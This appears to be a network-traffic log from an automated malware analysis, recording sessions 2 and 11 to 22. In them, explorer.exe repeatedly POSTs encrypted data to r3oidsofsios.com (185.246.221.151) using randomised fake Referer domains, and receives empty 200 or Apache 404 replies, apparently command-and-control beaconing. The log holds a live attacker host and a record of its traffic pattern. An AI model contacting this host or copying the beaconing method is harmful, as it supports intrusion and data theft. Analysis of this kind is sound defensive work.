73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


Session ID: 11 | Source: 192.168.2.7:49726 | Destination: 185.246.221.151:80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 30, 2022 00:12:35.722484112 CET | 308 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ugjjaam.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 123
Host: r3oidsofsios.com
Nov 30, 2022 00:12:35.722635031 CET | 308 | OUT | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 9d 02 1f d3 26 f2 fe 75 ae 1a 51 4a
Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uQJt/G7= xJ\J8f(].7Xp:
Nov 30, 2022 00:12:35.841212034 CET | 308 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Nov 2022 23:12:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8


Session ID: 12 | Source: 192.168.2.7:49727 | Destination: 185.246.221.151:80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 30, 2022 00:12:35.900690079 CET | 309 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://poflgkd.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 317
Host: r3oidsofsios.com
Nov 30, 2022 00:12:35.900711060 CET | 310 | OUT | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 9c 02 1f d3 26 f2 fe 75 f3 03 49 48
Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uIHAkBauHGe'?DNEFII"116R~` #*z2 [f(*oq8>15LT(^Z{(dxSx>~/;sKD.`I~SP~
Nov 30, 2022 00:12:36.028471947 CET | 310 | IN | HTTP/1.1 404 Not Found
Date: Tue, 29 Nov 2022 23:12:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 404
Connection: close
Content-Type: text/html; charset=utf-8
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


Session ID: 13 | Source: 192.168.2.7:49728 | Destination: 185.246.221.151:80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 30, 2022 00:12:36.105882883 CET | 311 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vshacsl.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 190
Host: r3oidsofsios.com
Nov 30, 2022 00:12:36.105950117 CET | 311 | OUT | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 9b 02 1f d3 26 f2 fe 75 b6 10 40 4c
Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&u@LN[4Q,TwDR4d,&Z&5]P$M{H_1 ?*ud~7n`N+Zk^mkG`c$
Nov 30, 2022 00:12:36.227736950 CET | 312 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Nov 2022 23:12:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8


Session ID: 14 | Source: 192.168.2.7:49729 | Destination: 185.246.221.151:80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 30, 2022 00:12:36.395279884 CET | 312 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kabjenh.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 227
Host: r3oidsofsios.com
Nov 30, 2022 00:12:36.395329952 CET | 313 | OUT | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 9a 02 1f d3 26 f2 fe 75 d2 68 58 45
Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uhXE*n1J3aj?8w5jOVeI'<)R15wvgjSxjm\d(fk)HDVaG6 B:*CvF{1N,
Nov 30, 2022 00:12:36.515480042 CET | 313 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Nov 2022 23:12:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8


Session ID: 15 | Source: 192.168.2.7:49730 | Destination: 185.246.221.151:80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 30, 2022 00:12:36.576366901 CET | 314 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vyukg.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 329
Host: r3oidsofsios.com
Nov 30, 2022 00:12:36.576366901 CET | 314 | OUT | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 99 02 1f d3 26 f2 fe 75 ca 78 18 2f
Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&ux/Y04v68v,9cx*fVvo/VX"OS$)a{MK;/@w-`pu^)I'*80j)9JBcljtEPuV=4;U
Nov 30, 2022 00:12:36.694408894 CET | 314 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Nov 2022 23:12:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8


Session ID: 16 | Source: 192.168.2.7:49731 | Destination: 185.246.221.151:80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 30, 2022 00:12:37.030910969 CET | 315 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xnfwjbsuvp.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 288
Host: r3oidsofsios.com
Nov 30, 2022 00:12:37.030910969 CET | 316 | OUT | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 98 02 1f d3 26 f2 fe 75 b6 0d 01 47
Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uG~9=Cm^\^:wJRS;9qEEWRM$"NsBJ'6p4'CTJf X[0Pgi?6W;.XI=Y'i3Py^b}4)'W#cq8k[XK
Nov 30, 2022 00:12:37.153716087 CET | 316 | IN | HTTP/1.1 404 Not Found
Date: Tue, 29 Nov 2022 23:12:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 404
Connection: close
Content-Type: text/html; charset=utf-8
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


Session ID: 17 | Source: 192.168.2.7:49732 | Destination: 185.246.221.151:80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 30, 2022 00:12:37.214968920 CET | 317 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nvftibg.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 185
Host: r3oidsofsios.com
Nov 30, 2022 00:12:37.214968920 CET | 317 | OUT | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 87 02 1f d3 26 f2 fe 75 cb 70 0b 22
Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&up"m#h0?Tm:yFE^SHm{%>Ow!6rXo,[UV3;7+\^#2yo=u8
Nov 30, 2022 00:12:37.334481001 CET | 318 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Nov 2022 23:12:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8


Session ID: 18 | Source: 192.168.2.7:49733 | Destination: 185.246.221.151:80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 30, 2022 00:12:37.404042959 CET | 318 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://okade.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 252
Host: r3oidsofsios.com
Nov 30, 2022 00:12:37.404042959 CET | 319 | OUT | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 86 02 1f d3 26 f2 fe 75 d9 07 56 51
Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uVQ6c-J^RXq4@H_D ^;O8.1]zh~4@V<-`U.NV?f2R:FUF>D5xDj)+$U!A-E_E9u2iLh
Nov 30, 2022 00:12:37.519344091 CET | 319 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Nov 2022 23:12:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8


Session ID: 19 | Source: 192.168.2.7:49734 | Destination: 185.246.221.151:80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 30, 2022 00:12:37.578322887 CET | 320 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://iungf.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 300
Host: r3oidsofsios.com
Nov 30, 2022 00:12:37.578350067 CET | 320 | OUT | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 85 02 1f d3 26 f2 fe 75 e2 6c 47 4e
Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&ulGN=97o,bXz"(>x@6L51cJ0OGK!l9rw9}1jo'za8>"U_I$R4<$~_;C{G7%P:$TshRhH
Nov 30, 2022 00:12:37.706790924 CET | 321 | IN | HTTP/1.1 404 Not Found
Date: Tue, 29 Nov 2022 23:12:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 404
Connection: close
Content-Type: text/html; charset=utf-8
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


Session ID: 2 | Source: 192.168.2.7:49717 | Destination: 185.246.221.151:80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 30, 2022 00:12:33.058831930 CET | 295 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ewfonmrybp.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 137
Host: r3oidsofsios.com
Nov 30, 2022 00:12:33.058873892 CET | 295 | OUT | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 96 02 1f d3 26 f2 fe 75 db 61 4a 58
Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uaJX.HPV9R@5>kL,8-\&H*09T~n
Nov 30, 2022 00:12:33.180012941 CET | 295 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Nov 2022 23:12:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8


Session ID: 20 | Source: 192.168.2.7:49735 | Destination: 185.246.221.151:80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 30, 2022 00:12:37.811109066 CET | 322 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bhqtkqlvvb.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 218
Host: r3oidsofsios.com
Nov 30, 2022 00:12:37.811254025 CET | 322 | OUT | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 84 02 1f d3 26 f2 fe 75 ef 40 25 56
Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&u@%VS'(L{J>7/i\b/:1$ckU(qA<v&qDqe0!KY;!zR)Jri"HJZ*Mhy-h~dko\
Nov 30, 2022 00:12:37.938654900 CET | 323 | IN | HTTP/1.1 404 Not Found
Date: Tue, 29 Nov 2022 23:12:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 404
Connection: close
Content-Type: text/html; charset=utf-8
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          21192.168.2.749736185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:38.007920027 CET323OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://whvkq.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 254
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:38.007920027 CET324OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 83 02 1f d3 26 f2 fe 75 ea 52 3f 23
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uR?#IS>|yY[u\.JZQk4Tw/4lCDp+<d!44=!O][UZMDKH+Z*G's/zT)bxp!@C;,p<kr
                          Nov 30, 2022 00:12:38.127856016 CET | 324                | IN        | HTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:38 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | Process
                          22         | 192.168.2.7 | 49737       | 185.246.221.151 | 80               | C:\Windows\explorer.exe
                          Timestamp                           | kBytes transferred | Direction | Data
                          Nov 30, 2022 00:12:38.187767029 CET | 325                | OUT       | POST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://rspyhp.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 161
                          Host: r3oidsofsios.com
